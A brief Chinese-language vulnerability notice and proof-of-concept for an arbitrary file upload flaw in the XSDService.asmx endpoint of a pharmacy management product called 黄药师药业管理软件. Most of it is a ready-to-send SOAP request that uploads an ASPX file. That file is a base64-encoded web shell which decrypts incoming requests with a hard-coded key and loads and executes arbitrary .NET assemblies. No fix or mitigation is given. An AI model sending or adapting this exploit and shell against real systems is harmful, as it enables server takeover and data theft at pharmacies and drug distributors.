漏洞描述
黄药师药业管理软件是一款专为药品行业设计的综合管理软件,适用于药品批发企业、连锁药店、零售药店等多种场景。黄药师药业管理软件存在任意文件上传漏洞,攻击者可以通过该漏洞获取服务器权限。
黄药师药业管理软件 xsdservice 存在任意文件上传漏洞
PoC代码
POST /XSDService.asmx HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 1943
Content-Type: text/xml; charset=utf-8
Soapaction: "http://tempuri.org/UploadFile"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadFile xmlns="http://tempuri.org/">
<filePath>2</filePath>
<fileName>33553.aspx</fileName>
<buffer>PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiU+PCV0cnl7c3RyaW5nIGtleSA9ICIzYzZlMGI4YTljMTUyMjRhIjtieXRlW10gZGF0YSA9IG5ldyBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlJpam5kYWVsTWFuYWdlZCgpLkNyZWF0ZURlY3J5cHRvcihTeXN0ZW0uVGV4dC5FbmNvZGluZy5EZWZhdWx0LkdldEJ5dGVzKGtleSksIFN5c3RlbS5UZXh0LkVuY29kaW5nLkRlZmF1bHQuR2V0Qnl0ZXMoa2V5KSkuVHJhbnNmb3JtRmluYWxCbG9jayhDb250ZXh0LlJlcXVlc3QuQmluYXJ5UmVhZChDb250ZXh0LlJlcXVlc3QuVG90YWxCeXRlcyksIDAsIENvbnRleHQuUmVxdWVzdC5Db250ZW50TGVuZ3RoKTtpZiAoQ29udGV4dC5BcHBsaWNhdGlvblsie3BheWxvYWRTdG9yZU5hbWV9Il0gPT0gbnVsbCl7IENvbnRleHQuQXBwbGljYXRpb25bIntwYXlsb2FkU3RvcmVOYW1lfSJdID0gKFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5KXR5cGVvZihTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSkuR2V0TWV0aG9kKCJMb2FkIiwgbmV3IFN5c3RlbS5UeXBlW10geyB0eXBlb2YoYnl0ZVtdKSB9KS5JbnZva2UobnVsbCwgbmV3IG9iamVjdFtdIHsgZGF0YSB9KTt9ZWxzZXsgb2JqZWN0IG8gPSAoKFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5KUNvbnRleHQuQXBwbGljYXRpb25bIntwYXlsb2FkU3RvcmVOYW1lfSJdKS5DcmVhdGVJbnN0YW5jZSgiTFkiKTsgU3lzdGVtLklPLk1lbW9yeVN0cmVhbSBvdXRTdHJlYW0gPSBuZXcgU3lzdGVtLklPLk1lbW9yeVN0cmVhbSgpO28uRXF1YWxzKG91dFN0cmVhbSk7IG8uRXF1YWxzKGRhdGEpO28uVG9TdHJpbmcoKTtieXRlW10gciA9IG91dFN0cmVhbS5Ub0FycmF5KCk7b3V0U3RyZWFtLkRpc3Bvc2UoKTtDb250ZXh0LlJlc3BvbnNlLkJpbmFyeVdyaXRlKG5ldyBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlJpam5kYWVsTWFuYWdlZCgpLkNyZWF0ZUVuY3J5cHRvcihTeXN0ZW0uVGV4dC5FbmNvZGluZy5EZWZhdWx0LkdldEJ5dGVzKGtleSksIFN5c3RlbS5UZXh0LkVuY29kaW5nLkRlZmF1bHQuR2V0Qnl0ZXMoa2V5KSkuVHJhbnNmb3JtRmluYWxCbG9jayhyLCAwLCByLkxlbmd0aCkpO319Y2F0Y2goU3lzdGVtLkV4Y2VwdGlvbil7fQ0KJT4=</buffer>
<Offset>1</Offset>
</UploadFile>
</soap:Body>
</soap:Envelope>